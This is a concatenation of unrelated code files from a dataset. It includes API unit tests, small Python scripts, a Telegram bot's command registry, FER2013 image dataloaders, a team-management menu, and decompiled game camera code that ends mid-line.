self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/breakdance/ROUTER123'\n }))\n assert isinstance(resp, webob.exc.HTTPNotFound)\n assert not self.ctl.run.called\n\n def test_multiple_calls(self):\n for i in range(10):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/poll/'\n }))\n\n assert self.ctl.run.call_args_list == [\n mock.call(['--debug', 'poll'])\n for _ in range(10)\n ]\n\n def test_invalid_request_method(self):\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'GET',\n 'PATH_INFO': '/poll/'\n }))\n assert isinstance(resp, webob.exc.HTTPMethodNotAllowed)\n assert not self.ctl.run.called\n\n\nclass TestRugAPIServer(unittest.TestCase):\n\n @mock.patch('eventlet.listen')\n @mock.patch('eventlet.wsgi')\n def test_bind_and_serve_ipv4(self, wsgi, listen):\n sock = listen.return_value\n server = rug.RugAPIServer()\n server.run('10.0.0.250', 44250)\n listen.assert_called_with(\n ('10.0.0.250', 44250),\n family=socket.AF_INET,\n backlog=128\n )\n args, kwargs = wsgi.server.call_args\n assert all([\n args[0] == sock,\n isinstance(args[1], rug.RugAPI),\n kwargs['custom_pool'] == server.pool,\n isinstance(kwargs['log'], log.KeywordArgumentAdapter)\n ])\n\n @mock.patch('eventlet.listen')\n @mock.patch('eventlet.wsgi')\n def test_bind_and_serve_ipv6(self, wsgi, listen):\n sock = listen.return_value\n server = rug.RugAPIServer()\n server.run('fdca:3ba5:a17a:acda::1', 44250)\n listen.assert_called_with(\n ('fdca:3ba5:a17a:acda::1', 44250),\n family=socket.AF_INET6,\n backlog=128\n )\n args, kwargs = wsgi.server.call_args\n assert all([\n args[0] == sock,\n isinstance(args[1], rug.RugAPI),\n kwargs['custom_pool'] == server.pool,\n isinstance(kwargs['log'], log.KeywordArgumentAdapter)\n ])\n\n @mock.patch('eventlet.listen')\n @mock.patch('eventlet.sleep', lambda x: None)\n def test_fail_to_bind(self, listen):\n listen.side_effect = socket.error(\n 99, \"Can't assign requested address\"\n )\n server = rug.RugAPIServer()\n self.assertRaises(\n RuntimeError,\n server.run,\n 'fdca:3ba5:a17a:acda::1',\n 44250,\n )\n assert listen.call_args_list == [\n mock.call(('fdca:3ba5:a17a:acda::1', 44250),\n family=socket.AF_INET6, backlog=128)\n for i in range(5)\n ]\n\n @mock.patch('eventlet.listen')\n @mock.patch('eventlet.wsgi')\n @mock.patch('eventlet.sleep', lambda x: None)\n def test_bind_fails_on_first_attempt(self, wsgi, listen):\n sock = mock.Mock()\n listen.side_effect = [\n socket.error(99, \"Can't assign requested address\"),\n sock\n ]\n server = rug.RugAPIServer()\n server.run('fdca:3ba5:a17a:acda::1', 44250)\n assert listen.call_args_list == [\n mock.call(('fdca:3ba5:a17a:acda::1', 44250),\n family=socket.AF_INET6, backlog=128)\n for i in range(2) # fails the first time, succeeds the second\n ]\n args, kwargs = wsgi.server.call_args\n assert all([\n args[0] == sock,\n isinstance(args[1], rug.RugAPI),\n kwargs['custom_pool'] == server.pool,\n isinstance(kwargs['log'], log.KeywordArgumentAdapter)\n ])\n","sub_path":"astara/test/unit/api/test_rug_api.py","file_name":"test_rug_api.py","file_ext":"py","file_size_in_byte":7538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"60422911","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Marc Ferras \n#\n# Copyright (C) 2012-2013 Idiap Research Institute, Martigny, Switzerland\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, version 3 of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# Script to check that all filenames in all_files.lst exist in the filesystem.\n\nimport os.path\nimport sys\n\nfilelist = 'all_files.lst'\nprefix='DATABASE_DIRECTORY_PREFIX'\n\nif prefix=='DATABASE_DIRECTORY_PREFIX':\n print ('please replace variable ''prefix'' in script ''check-all-files-exist.py'' with the NIST SRE database directory in your system.')\n sys.exit(1)\n\next='.sph'\n\nstep = 2000\nok = 0\nnok = 0\nfileno = 0\nwith open(filelist) as fp:\n for fn in fp.readlines():\n fn = fn.strip()\n path = fn.split()[0]\n path = os.path.join(prefix,path+ext)\n fileno += 1\n if os.path.isfile(path):\n ok += 1\n else:\n nok += 1\n print ('file ' + path + ' not found. ' + str(nok) + ' incorrect paths')\n\n if fileno == step:\n print (str(fileno) + ' files checked')\n step += 2000\n\nif nok==0:\n print ('all files were found in the filesystem')\nelse:\n print (str(ok) + ' filenames found in the filesystem')\n print (str(nok) + ' filenames not found in the filesystem')\n","sub_path":"bob/db/nist_sre12/sre12/check-all-files-exist.py","file_name":"check-all-files-exist.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"50840346","text":"#Agregar ingredientes de una pizza\n# practica 7-4\n\ntoppings_list = [] #Lista donde se guardan los toppings\n\nwhile True:\n topping = input(\"Enter the topping for your pizza(Quit for exit): \")\n\n if topping == 'quit':\n break\n else:\n toppings_list.append(topping)\n print(\"You will add that topping in your pizza!\")\n\nprint(\"Topping list\")\nprint(toppings_list)\n\n\n","sub_path":"Ejemplos/pizza_toppingsV2.py","file_name":"pizza_toppingsV2.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"184343174","text":"import re\nimport os\nimport reader\nimport time\n\nszkoda_ends = ['a', 'y', 'zie', 'ę', 'ą', 'o', 'om', 'ami', 'ach']\nwords = []\n\ndef proper(word):\n if word.lower() == 'szkód':\n return True\n elif word[5:] in szkoda_ends:\n return True\n return False\n\ndef find_szkoda(data):\n for text in data['items']:\n if not reader.in_2008(text):\n continue\n found = re.findall(r'\\b[Ss]zk[oó]d\\w{0,3}\\b', text['textContent'])\n\n for word in found:\n if proper(word):\n words.append(word)\n break\n\n\ndef main():\n path_to_json = 'C:/Users/Professional/Desktop/pjn/data/json'\n json_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\n for jfile in json_files:\n find_szkoda(reader.read_json(path_to_json + '/' + jfile))\n\n\nstart_time = time.time()\nmain()\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\nprint(len(words))\nprint(words)\n","sub_path":"pjn-lab1/szkoda.py","file_name":"szkoda.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"369349946","text":"\"\"\"Telegram bot based on python-telegram-bot with various commands.\"\"\"\n\nfrom telegram.ext import (CommandHandler, Filters,\n MessageHandler, CallbackQueryHandler)\nfrom datetime import time\n\nimport main.commands as commands\nfrom main import LOGGER, dispatcher, textfiltering, updater\nfrom main.helpers import error_callback, ping, db_backup\n\n\n# Bot commands\nUSERCOMMANDS = [\n 'Команды для рядовых пользователей',\n ('slap', commands.slap,\n 'Кого-то унизить (надо ответить жертве, чтобы бот понял кого бить)'),\n ('duel', commands.duel,\n 'Устроить дуэль (надо ответить тому, с кем будет дуэль)'),\n ('duelscore', commands.duelscore, 'Мой счёт в дуэлях'),\n ('duelranking', commands.duelranking,\n 'Ранкинг дуэлей чата (показывает только тех, у кого есть убийства и смерти)'),\n ('pidor', commands.pidor,\n 'Пидор дня (новый пидор каждый день по немецкому времени)'),\n ('pidorme', commands.pidorme, 'Сколько раз вы были пидором дня'),\n ('pidorstats', commands.pidorstats, 'Статы чата по пидорам дня'),\n (\"flip\", commands.flip, 'Бросить монетку (Орёл/Решка)'),\n (\"dadjoke\", commands.dadjoke, 'Случайная шутка бати'),\n (\"dog\", commands.animal, 'Случайное фото собачки'),\n (\"cat\", commands.animal, 'Случайное фото котика'),\n (\"help\", commands.bothelp, 'Меню помощи'),\n ('whatsnew', commands.whatsnew, 'Новое в боте'),\n ('adminmenu', commands.adminmenu, 'Админское меню'),\n]\nONLYADMINCOMMANDS = [\n 'Команды для администраторов групп',\n ('setcooldown', commands.setcooldown, 'Поставить новую задержку на команды'),\n ('duelstatus', commands.duelstatus, 'Включить/Выключить дуэли (on/off)'),\n ('immune', commands.immune,\n 'Добавить пользователю иммунитет на задержку команд (ответить ему)'),\n ('unimmune', commands.unimmune, 'Снять иммунитет (ответить или имя)'),\n ('immunelist', commands.immunelist, 'Лист людей с иммунитетом'),\n ('leave', commands.leave, 'Сказать боту уйти')\n]\nUNUSUALCOMMANDS = [\n 'Нечастые команды',\n ('allcommands', commands.allcommands, 'Все команды бота'),\n ('start', commands.start, 'Начальное сообщение бота'),\n ('getlogs', commands.getlogs,\n 'Получить логи бота (только для разработчика)'),\n ('getdatabase', commands.getdatabase, 'Получить датабазу'),\n ('promote', commands.promote, 'Хехехехе')\n]\n\n\ndef main():\n \"\"\"Main function.\"\"\"\n LOGGER.info('Adding handlers...')\n # Add command handles\n for commandlists in (USERCOMMANDS, ONLYADMINCOMMANDS, UNUSUALCOMMANDS):\n for command in commandlists[1:]:\n dispatcher.add_handler(CommandHandler(\n command[0], command[1],\n filters=(~Filters.update.edited_message & Filters.command)))\n # Add message handlers\n dispatcher.add_handler(MessageHandler(\n (Filters.status_update.new_chat_members &\n ~Filters.update.edited_message), textfiltering.welcomer))\n dispatcher.add_handler(MessageHandler(\n (Filters.status_update.left_chat_member &\n ~Filters.update.edited_message), textfiltering.farewell))\n dispatcher.add_handler(MessageHandler(\n (Filters.text &\n ~Filters.update.edited_message), textfiltering.message_filter))\n # Add callback handlers\n dispatcher.add_handler(CallbackQueryHandler(commands.reroll,\n pattern='Reroll'))\n # Log errors\n dispatcher.add_error_handler(error_callback)\n # Add job queue\n updater.job_queue.run_repeating(\n callback=ping, interval=60 * 60, first=0)\n updater.job_queue.run_daily(\n callback=db_backup, time=time(0, 0, 0, 0))\n # Start polling\n updater.start_polling(clean=True)\n LOGGER.info('Polling started.')\n LOGGER.info('-----------------------------------------------')\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"thebot.py","file_name":"thebot.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"339558736","text":"# Imports\r\nimport torch\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torchvision import datasets, transforms\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom skimage import exposure\r\nfrom skimage.transform import resize as sk_resize\r\nimport warnings\r\nwarnings.filterwarnings('ignore', category=UserWarning)\r\n\r\n\r\n# Define the transforms for the training and validation sets\r\nBATCH_SIZE = 256\r\nDATA_DIR = \"../../fer2013/fer2013.csv\"\r\n\r\n\r\ndef get_dataloaders(batch_size=BATCH_SIZE, data_dir=DATA_DIR,\r\n chunksize=10000, resize=None, to_rgb=True, hist_eq=False, normalize=False):\r\n\r\n to_rgb = None\r\n chunksize = None\r\n resize = None\r\n hist_eq = None\r\n\r\n list_transforms = [transforms.ToTensor()]\r\n if normalize:\r\n list_transforms = list_transforms + [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\r\n data_transforms = {\r\n 'Training': transforms.Compose(list_transforms),\r\n 'PublicTest': transforms.Compose(list_transforms)\r\n }\r\n\r\n # Load the datasets with ImageFolder\r\n image_datasets = {\r\n x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x])\r\n for x in ['Training', 'PublicTest']\r\n }\r\n\r\n # Using the image datasets and the transforms, define the dataloaders\r\n dataloaders = {\r\n x: DataLoader(image_datasets[x], batch_size=batch_size, num_workers=4, shuffle=True)\r\n for x in ['Training', 'PublicTest']\r\n }\r\n\r\n return dataloaders\r\n\r\n\r\ndef get_dataloaders_fer48(data_dir, batch_size=BATCH_SIZE, chunksize=10000,\r\n resize=None, add_channel_dim=False, to_rgb=True, hist_eq=False, normalize=False):\r\n\r\n \"\"\"\r\n\r\n :param data_dir:\r\n :param batch_size:\r\n :param chunksize:\r\n :param transform:\r\n :return:\r\n \"\"\"\r\n\r\n class AddChannel(object):\r\n def __call__(self, im):\r\n return np.expand_dims(im, 2)\r\n\r\n class HistEq(object):\r\n def __call__(self, im):\r\n # res = AddChannel()(exposure.equalize_hist(im))\r\n return exposure.equalize_hist(im)\r\n\r\n class ToRGB(object):\r\n def __call__(self, im):\r\n if len(im.shape) < 3:\r\n im = np.expand_dims(im, 2)\r\n return np.repeat(im, 3, axis=2)\r\n\r\n class SkResize(object):\r\n def __init__(self, size):\r\n self.size = size\r\n\r\n def __call__(self, im, size=None):\r\n return sk_resize(im, self.size)\r\n\r\n data_transforms = [transforms.ToTensor()]\r\n if resize:\r\n # data_transforms = [transforms.Resize(resize)] + data_transforms\r\n data_transforms = [SkResize(resize)] + data_transforms\r\n if hist_eq:\r\n data_transforms.insert(1, HistEq())\r\n if to_rgb:\r\n data_transforms.insert(2, ToRGB())\r\n elif add_channel_dim:\r\n data_transforms.insert(2, AddChannel())\r\n elif to_rgb:\r\n data_transforms.insert(1, ToRGB())\r\n\r\n elif hist_eq:\r\n data_transforms = [HistEq()] + data_transforms\r\n if to_rgb:\r\n data_transforms.insert(1, ToRGB())\r\n elif add_channel_dim:\r\n data_transforms.insert(1, AddChannel())\r\n elif to_rgb:\r\n data_transforms = [ToRGB()] + data_transforms\r\n elif add_channel_dim:\r\n data_transforms = [AddChannel()] + data_transforms\r\n\r\n if normalize:\r\n data_transforms = data_transforms + [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\r\n\r\n data_transforms = transforms.Compose(data_transforms)\r\n\r\n image_datasets = {\r\n x: FerDataset48(data_dir, x, chunksize, data_transforms)\r\n for x in ['Training', 'PublicTest']\r\n }\r\n\r\n # Using the image datasets and the transforms, define the dataloaders\r\n dataloaders = {\r\n x: DataLoader(image_datasets[x], batch_size=batch_size, num_workers=8, shuffle=True)\r\n for x in ['Training', 'PublicTest']\r\n }\r\n\r\n return dataloaders\r\n\r\n\r\nclass FerDataset48(Dataset):\r\n \"\"\"\r\n Custom pytorch dataset class implementation to load utk_face images\r\n \"\"\"\r\n\r\n def __init__(self, data_dir, flag, chunksize=20000, transform=None):\r\n \"\"\"\r\n\r\n :param root_dir:\r\n :param transform:\r\n \"\"\"\r\n self.data = self._read_csv(data_dir, chunksize, flag)\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n \"\"\"\r\n\r\n :return:\r\n \"\"\"\r\n return self.data.shape[0]\r\n\r\n def __getitem__(self, idx):\r\n \"\"\"\r\n\r\n :param idx:\r\n :return:\r\n \"\"\"\r\n\r\n im = np.array([\r\n int(i) for i in self.data['pixels'].iloc[idx].split(' ')\r\n ]).reshape((48, 48))\r\n\r\n # lab = np.array(self.data['emotion'].iloc[idx]).reshape((1, 1)).astype(np.uint8)\r\n lab = np.array(self.data['emotion'].iloc[idx]).astype(np.uint8)\r\n\r\n im, lab = self.transform(im).to(torch.float32), torch.from_numpy(lab).long() # torch.from_numpy(lab).unsqueeze_(0)\r\n # print(im.dtype, im.size())\r\n # print(lab.dtype, lab.size())\r\n\r\n return im, lab\r\n\r\n def _read_csv(self, path_to_csv, chunksize, flag='Training'):\r\n chunks = pd.read_csv(path_to_csv, sep=',', chunksize=chunksize)\r\n list_chunks = []\r\n for chunk in chunks:\r\n mask = chunk['Usage'] == flag\r\n list_chunks.append(chunk.loc[mask])\r\n return pd.concat(list_chunks)\r\n\r\ndata_loader_lambda = {\r\n 'get_dataloaders_fer48': get_dataloaders_fer48,\r\n 'get_dataloaders': get_dataloaders\r\n}","sub_path":"emotion_detection/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"550410729","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : ssteiche\nDate : 2019-04-24\nPurpose: Count the occurances of words in files \n\"\"\"\n\nimport argparse\nimport sys\nfrom collections import defaultdict\nimport re\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Print word frequencies',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n 'files', metavar='FILE', help='A positional argument', nargs='+',\n type=argparse.FileType('r', encoding='UTF-8'))\n\n parser.add_argument(\n '-s',\n '--sort',\n help='Sort by word or frequency',\n metavar='str',\n type=str,\n default='word')\n\n parser.add_argument(\n '-m',\n '--min',\n help='Minimum count',\n metavar='int',\n type=int,\n default=0)\n\n return parser.parse_args()\n\n# --------------------------------------------------\ndef warn(msg):\n \"\"\"Print a message to STDERR\"\"\"\n print(msg, file=sys.stderr)\n\n\n# --------------------------------------------------\ndef die(msg='Something bad happened'):\n \"\"\"warn() and exit with error\"\"\"\n warn(msg)\n sys.exit(1)\n\n# --------------------------------------------------\ndef freqs(infiles):\n \"\"\"build a dictionary with word frequency counts\"\"\"\n counts = defaultdict(int)\n for infile in infiles:\n for line in infile:\n for word in line.split():\n if re.sub('[^a-zA-Z0-9]', '', word).lower() == '':\n continue\n counts[re.sub('[^a-zA-Z0-9]', '', word).lower()] += 1\n\n return counts\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n args = get_args()\n files = args.files\n sort = args.sort\n minc = args.min\n\n outc = freqs(files)\n if sort == 'word':\n for entry in sorted(outc.keys()):\n if outc[entry] >= minc:\n print('{:20} {}'.format(entry, outc[entry]))\n elif sort == 'frequency':\n pairs = sorted([(x[1], x[0]) for x in outc.items()])\n for num, word in pairs:\n if num >= minc:\n print('{:20} {}'.format(word, num))\n\n #print(outc.keys())\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/14-word-freak/freak.py","file_name":"freak.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"413008354","text":"from emp_store import teams\nfrom emp_store import employees\nimport employee as e\n\ndef manage_all_team_menu():\n\tprint(\"\\t press 1. create team \")\n\tprint(\"\\t press 2. Display team \")\n\tprint(\"\\t press 3. manage team \")\n\tprint(\"\\t press4. Delete team \")\n\tprint(\"\\t press5. exit \")\ndef manage_all_team():\n\twhile True:\n\t\tmanage_all_team_menu()\n\t\tch=int(input(\"enter your choice : \"))\n\t\tif ch == 1:\n\t\t#create team\n \tcreate_team()\n\t\telif ch == 2:\n\t\t#display team\n \tdisplay_team()\n\t\telif ch == 3:\n\t\t#manage team\n \tmanage_team()\n\t\telif ch == 4:\n\t\t#delete team\n \tdelete_team()\n\t\telif ch== 5:\n\t\t#exit\n\t\t\tbreak;\n\t\telse:\n\t\t\tprint(\"invalid option\")\ndef create_team():\n\tteam_name=input(\"\\tEnter team name : \")\n\tteams[team_name]=[]\n\t\ndef display_team():\n\tfor key,value in teams.items(): \n\t\tname_string = \"\"\n\t\tfor i in value:\n\t\t\tname_string = name_string +\"|\"+employees[i][\"name\"]\n\t\tprint(f\"{key} => {name_string}\")\n\t\ndef delete_team():\n\tteam_name=input(\"\\tEnter team name \")\n\tif team_name in teams.keys():\n\t\tdel teams[team_name]\n\t\tprint(\"\\t Deleted the team \")\n\telse:\n\t\tprint(\"\\t incorrect name \")\ndef manage_team_menu():\n\tprint(\"\\t press 1. Add member \")\n\tprint(\"\\t press 2. Delete member \")\n\tprint(\"\\t press 3. Display member list \")\n\tprint(\"\\t press 4. Exit\")\ndef manage_team():\n\twhile True:\n\t\tteam_name=input(\"\\t\\t Enter team name : \")\n\t\tmanage_team_menu()\n\t\tch=int(input(\"enter your choice\"))\n\t\tif ch == 1:\n #Add member\n\t\t\tadd_member(team_name)\n\t\telif ch == 2:\n #Delete member\n delete_member(team_name)\n\t\telif ch == 3:\n #Display\n\t\t\tdisplay_member(team_name)\n\t\telif ch==4:\n\t\t#exit\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"\\tinvalid\")\ndef add_member(team_name):\n\te.display_employee()\n\teid=int(input(\"\\t\\t Enter the employee id of employee \"))\n\tif eid in e.employees.keys():\n\t\tteams[team_name].append(eid)\n\telse:\n\t\tprint(\"\\t\\t wrong eid\")\n\ndef delete_member(team_name):\n\tdisplay_member(team_name)\n\temployee_id=int(input(\"\\t\\tEnter the employee id \"))\n\tif employee_id in teams[team_name]:\n\t\tteams[team_name].remove(employee_id)\n\telse:\n\t\tprint(\"\\t\\twrong id\")\n\ndef display_member(team_name):\n\tname_string=\"\"\n\tfor i in teams[team_name]:\n\t\tname_string=name_string +\"|\"+str(i)+\".\"+e.employees[i][\"name\"]\n\tprint(f\"{name_string}\")\n\n\n","sub_path":"teams.py","file_name":"teams.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6869193","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/gui/hangar_cameras/hangar_camera_manager.py\nimport math\nfrom functools import partial\nfrom logging import getLogger\nimport BigWorld\nimport Math\nimport Keys\nfrom AvatarInputHandler import mathUtils\nfrom skeletons.account_helpers.settings_core import ISettingsCore\nfrom skeletons.gui.shared.utils import IHangarSpace\nfrom helpers import dependency\nfrom gui import g_keyEventHandlers, g_mouseEventHandlers\nfrom gui.shared import g_eventBus\nfrom gui.hangar_cameras.hangar_camera_common import CameraRelatedEvents, CameraMovementStates\nfrom gui.hangar_cameras.hangar_camera_idle import HangarCameraIdle\nfrom gui.hangar_cameras.hangar_camera_parallax import HangarCameraParallax\nfrom AvatarInputHandler.cameras import FovExtended\nfrom vehicle_systems.stricted_loading import makeCallbackWeak\n_logger = getLogger(__name__)\nIMMEDIATE_CAMERA_MOVEMENT_MODE = 0\nFAST_CAMERA_MOVEMENT_MODE = 1\nGRADUAL_CAMERA_MOVEMENT_MODE = 2\n\nclass HangarCameraYawFilter(object):\n\n def __init__(self, start, end, camSens):\n self.__start = start\n self.__end = end\n self.__camSens = camSens\n self.__reversed = self.__start > self.__end\n self.__cycled = int(math.degrees(math.fabs(self.__end - self.__start))) >= 359.0\n self.__prevDirection = 0.0\n self.__camSens = camSens\n self.__yawLimits = None\n self.setConstraints(start, end)\n return\n\n def setConstraints(self, start, end):\n self.__start = start\n self.__end = end\n if int(math.fabs(math.degrees(self.__start)) + 0.5) >= 180:\n self.__start *= 179 / 180.0\n if int(math.fabs(math.degrees(self.__end)) + 0.5) >= 180:\n self.__end *= 179 / 180.0\n\n def setYawLimits(self, limits):\n self.__yawLimits = limits\n\n def toLimit(self, inAngle):\n inAngle = mathUtils.reduceToPI(inAngle)\n if self.__cycled:\n return inAngle\n if self.__reversed:\n if inAngle >= self.__start and inAngle <= self.__end:\n return inAngle\n elif self.__start <= inAngle <= self.__end:\n return inAngle\n delta1 = self.__start - inAngle\n delta2 = self.__end - inAngle\n return self.__end if math.fabs(delta1) > math.fabs(delta2) else self.__start\n\n def getNextYaw(self, currentYaw, targetYaw, delta):\n if delta == 0.0 or self.__prevDirection * delta < 0.0:\n targetYaw = currentYaw\n self.__prevDirection = delta\n nextYaw = targetYaw + delta * self.__camSens\n if delta > 0.0:\n if nextYaw >= currentYaw:\n deltaYaw = nextYaw - currentYaw\n else:\n deltaYaw = 2.0 * math.pi - currentYaw + nextYaw\n if deltaYaw > math.pi:\n nextYaw = currentYaw + math.pi * 0.9\n else:\n if nextYaw <= currentYaw:\n deltaYaw = currentYaw - nextYaw\n else:\n deltaYaw = 2.0 * math.pi + currentYaw - nextYaw\n if deltaYaw > math.pi:\n nextYaw = currentYaw - math.pi * 0.9\n if not self.__cycled:\n if not self.__reversed:\n if delta > 0.0 and (nextYaw > self.__end or nextYaw < currentYaw):\n nextYaw = self.__end\n elif delta < 0.0 and (nextYaw < self.__start or nextYaw > currentYaw):\n nextYaw = self.__start\n elif delta > 0.0 and nextYaw > self.__end and nextYaw <= self.__start:\n nextYaw = self.__end\n elif delta < 0.0 and nextYaw < self.__start and nextYaw >= self.__end:\n nextYaw = self.__start\n if self.__yawLimits is not None:\n if nextYaw < 0.0:\n nextYaw += 2.0 * math.pi\n nextYaw = mathUtils.clamp(self.__yawLimits[0], self.__yawLimits[1], nextYaw)\n return nextYaw\n\n\nclass HangarCameraManager(object):\n settingsCore = dependency.descriptor(ISettingsCore)\n hangarSpace = dependency.descriptor(IHangarSpace)\n\n @property\n def handleInactiveCamera(self):\n return self.__handleInactiveCamera\n\n @handleInactiveCamera.setter\n def handleInactiveCamera(self, value):\n self.__handleInactiveCamera = value\n\n def __init__(self, spaceId):\n self.__spaceId = spaceId\n self.__cam = None\n self.__cameraIdle = None\n self.__cameraParallax = None\n self.__yawCameraFilter = None\n self.__camConstraints = [ None for _ in range(3) ]\n self.__isMouseDown = False\n self.__currentEntityId = None\n self.__movementDisabled = False\n self.__handleInactiveCamera = False\n self.__isPreviewMode = False\n return\n\n def init(self):\n self.__setupCamera()\n self.__isPreviewMode = False\n self.hangarSpace.onSpaceCreate += self.__onSpaceCreated\n self.hangarSpace.onSpaceDestroy += self.__onSpaceDestroy\n self.settingsCore.onSettingsChanged += self.__handleSettingsChange\n g_eventBus.addListener(CameraRelatedEvents.IDLE_CAMERA, self.__handleIdleCameraActivation)\n g_eventBus.addListener(CameraRelatedEvents.VEHICLE_LOADING, self.__handleVehicleLoading)\n g_eventBus.addListener(CameraRelatedEvents.CAMERA_ENTITY_UPDATED, self.__handleEntityUpdated)\n g_eventBus.addListener(CameraRelatedEvents.FORCE_DISABLE_CAMERA_MOVEMENT, self.__handleDisableMovement)\n\n def destroy(self):\n self.hangarSpace.onSpaceCreate -= self.__onSpaceCreated\n self.hangarSpace.onSpaceDestroy -= self.__onSpaceDestroy\n self.settingsCore.onSettingsChanged -= self.__handleSettingsChange\n g_eventBus.removeListener(CameraRelatedEvents.IDLE_CAMERA, self.__handleIdleCameraActivation)\n g_eventBus.removeListener(CameraRelatedEvents.VEHICLE_LOADING, self.__handleVehicleLoading)\n g_eventBus.removeListener(CameraRelatedEvents.CAMERA_ENTITY_UPDATED, self.__handleEntityUpdated)\n g_eventBus.removeListener(CameraRelatedEvents.FORCE_DISABLE_CAMERA_MOVEMENT, self.__handleDisableMovement)\n if self.__cameraIdle:\n self.__cameraIdle.destroy()\n self.__cameraIdle = None\n if self.__cameraParallax:\n self.__cameraParallax.destroy()\n self.__cameraParallax = None\n if self.__cam is BigWorld.camera():\n self.__cam.spaceID = 0\n BigWorld.worldDrawEnabled(False)\n self.__cam = None\n FovExtended.instance().resetFov()\n return\n\n def __onSpaceCreated(self):\n g_mouseEventHandlers.add(self.__handleMouseEvent)\n g_keyEventHandlers.add(self.__handleKeyEvent)\n g_eventBus.addListener(CameraRelatedEvents.LOBBY_VIEW_MOUSE_MOVE, self.__handleLobbyViewMouseEvent)\n\n def __onSpaceDestroy(self, inited):\n if inited:\n g_mouseEventHandlers.remove(self.__handleMouseEvent)\n g_keyEventHandlers.remove(self.__handleKeyEvent)\n g_eventBus.removeListener(CameraRelatedEvents.LOBBY_VIEW_MOUSE_MOVE, self.__handleLobbyViewMouseEvent)\n\n def setCameraLocation(self, targetPos=None, pivotPos=None, yaw=None, pitch=None, dist=None, camConstraints=None, ignoreConstraints=False, movementMode=FAST_CAMERA_MOVEMENT_MODE, previewMode=False):\n from gui.ClientHangarSpace import hangarCFG\n cfg = hangarCFG()\n sourceMat = Math.Matrix(self.__cam.source)\n yawS = sourceMat.yaw if yaw is None else yaw\n pitchS = sourceMat.pitch if pitch is None else pitch\n if dist is None:\n dist = self.__cam.pivotMaxDist\n if movementMode != IMMEDIATE_CAMERA_MOVEMENT_MODE:\n self.__cam.movementMode = movementMode\n if camConstraints is not None:\n self.__camConstraints = list(camConstraints)\n else:\n self.__camConstraints[0] = cfg['cam_pitch_constr']\n self.__camConstraints[1] = cfg['cam_yaw_constr']\n if not ignoreConstraints:\n if yaw is not None or pitch is not None:\n camYawConstr = self.__camConstraints[1]\n startYaw, endYaw = camYawConstr\n self.__yawCameraFilter.setConstraints(math.radians(startYaw), math.radians(endYaw))\n self.__yawCameraFilter.setYawLimits(camYawConstr)\n yawS = self.__yawCameraFilter.toLimit(yawS)\n camPitchConstr = self.__camConstraints[0]\n startPitch, endPitch = (math.radians(pc) for pc in camPitchConstr)\n pitchS = mathUtils.clamp(startPitch, endPitch, pitchS)\n distConstr = cfg['preview_cam_dist_constr'] if self.__isPreviewMode else self.__camConstraints[2]\n minDist, maxDist = distConstr\n dist = mathUtils.clamp(minDist, maxDist, dist)\n if yaw is not None or pitch is not None:\n mat = Math.Matrix()\n pitchS = mathUtils.clamp(-math.pi / 2 * 0.99, math.pi / 2 * 0.99, pitchS)\n mat.setRotateYPR((yawS, pitchS, 0.0))\n self.__cam.source = mat\n if targetPos is not None:\n targetMat = self.__cam.target\n targetMat.setTranslate(targetPos)\n self.__cam.target = targetMat\n self.__cam.target.setTranslate(targetPos)\n if pivotPos is not None:\n self.__cam.pivotPosition = pivotPos\n self.__cam.pivotMaxDist = dist\n if movementMode == IMMEDIATE_CAMERA_MOVEMENT_MODE:\n self.__cam.forceUpdate()\n self.setPreviewMode(previewMode)\n return\n\n def setPreviewMode(self, previewMode):\n self.__isPreviewMode = previewMode\n\n def isPreviewMode(self):\n return self.__isPreviewMode\n\n def getCurrentEntityId(self):\n return self.__currentEntityId\n\n def getCameraLocation(self):\n sourceMat = Math.Matrix(self.__cam.source)\n targetMat = 